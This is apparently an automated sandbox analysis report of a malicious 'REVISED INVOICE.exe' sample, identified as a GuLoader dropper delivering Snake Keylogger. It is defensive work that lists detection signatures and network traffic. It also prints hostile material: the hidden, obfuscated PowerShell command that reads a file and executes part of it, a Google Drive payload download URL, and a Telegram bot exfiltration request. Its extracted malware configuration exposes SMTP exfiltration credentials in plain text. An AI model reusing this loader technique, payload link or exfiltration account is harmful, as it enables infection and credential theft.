Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REVISED INVOICE.exe

Overview

General Information

Sample name:REVISED INVOICE.exe
Analysis ID:1541088
MD5:8274b1a41b53bf35e0b4330a20010d4c
SHA1:0b263f01dd3e10389cd4fe6575d114ea301ee874
SHA256:d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w7x64
  • REVISED INVOICE.exe (PID: 3476 cmdline: "C:\Users\user\Desktop\REVISED INVOICE.exe" MD5: 8274B1A41B53BF35E0B4330A20010D4C)
    • powershell.exe (PID: 1960 cmdline: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • msiexec.exe (PID: 2504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "alex@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 2504JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 2504JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe
          Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\SysWOW64\msiexec.exe, QueryName: checkip.dyndns.org
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 2504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", CommandLine: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REVISED INVOICE.exe", ParentImage: C:\Users\user\Desktop\REVISED INVOICE.exe, ParentProcessId: 3476, ParentProcessName: REVISED INVOICE.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", ProcessId: 1960, ProcessName: powershell.exe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\Temp\xb55l4s3.d1s.ps1
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-24T12:03:11.519251+020028033053Unknown Traffic192.168.2.2249166188.114.97.3443TCP
          2024-10-24T12:03:19.225896+020028033053Unknown Traffic192.168.2.2249174188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-24T12:03:09.780235+020028032742Potentially Bad Traffic192.168.2.2249164193.122.130.080TCP
          2024-10-24T12:03:10.952320+020028032742Potentially Bad Traffic192.168.2.2249164193.122.130.080TCP
          2024-10-24T12:03:12.849739+020028032742Potentially Bad Traffic192.168.2.2249167132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-24T12:03:03.413673+020028032702Potentially Bad Traffic192.168.2.2249162142.250.186.142443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "alex@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: REVISED INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
          Source: REVISED INVOICE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.481790461.0000000004E36000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9449h5_2_214B9188
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B95F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B993A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BFC19h5_2_214BF939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BF2E9h5_2_214BF009
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B67D4h5_2_214B6823
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BEE51h5_2_214BEB70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B72B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B95E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B6C80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B7491
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BF781h5_2_214BF4A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B7945h5_2_214B7758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B82CFh5_2_214B7758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B67D4h5_2_214B6638
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588A42h5_2_21588748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21582C69h5_2_21582998
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E052h5_2_2158DD58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585A19h5_2_21585748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158F83Ah5_2_2158F540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21580C41h5_2_21580970
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587A41h5_2_21587770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158C86Ah5_2_2158C570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583A31h5_2_21583760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158BA12h5_2_2158B718
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215867E1h5_2_21586510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215827D1h5_2_21582500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158D1FAh5_2_2158CF00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581A09h5_2_21581738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158A22Ah5_2_21589F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581EA1h5_2_21581BD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158D6C2h5_2_2158D3C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583EA1h5_2_21583BF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158A6F2h5_2_2158A3F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585EB1h5_2_21585BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158BEDAh5_2_2158BBE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158B082h5_2_2158AD88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21584C51h5_2_21584980
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158EEAAh5_2_2158EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21586C7Ah5_2_215869A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158989Ah5_2_215895A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21584321h5_2_21584050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158B54Ah5_2_2158B250
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21580311h5_2_21580040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587111h5_2_21586E40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21586349h5_2_21586078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158F372h5_2_2158F078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21582339h5_2_21582068
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21589D62h5_2_21589A68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215850E9h5_2_21584E18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588F0Ah5_2_21588C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215810D9h5_2_21580E08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587ED9h5_2_21587C08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158FD02h5_2_2158FA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158CD32h5_2_2158CA38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583101h5_2_21582E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E51Ah5_2_2158E220
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215807A9h5_2_215804D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215875A9h5_2_215872D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215893D2h5_2_215890D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583599h5_2_215832C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158ABBAh5_2_2158A8C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215847B9h5_2_215844E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E9E2h5_2_2158E6E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158DB8Ah5_2_2158D890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585581h5_2_215852B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158C3A2h5_2_2158C0A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581571h5_2_215812A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588412h5_2_215880A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169165Ah5_2_21691360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21692E42h5_2_21692B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21690802h5_2_21690508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21690CCAh5_2_216909D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21693C9Ah5_2_216939A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 216924B2h5_2_216921B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21694162h5_2_21693E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169033Ah5_2_21690040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691B22h5_2_21691828
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169330Ah5_2_21693010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691FEAh5_2_21691CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 216937D2h5_2_216934D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169297Bh5_2_21692680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691192h5_2_21690E98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21725F38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21725F28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21722E16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21722B00

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49162 -> 142.250.186.142:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.97.3:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
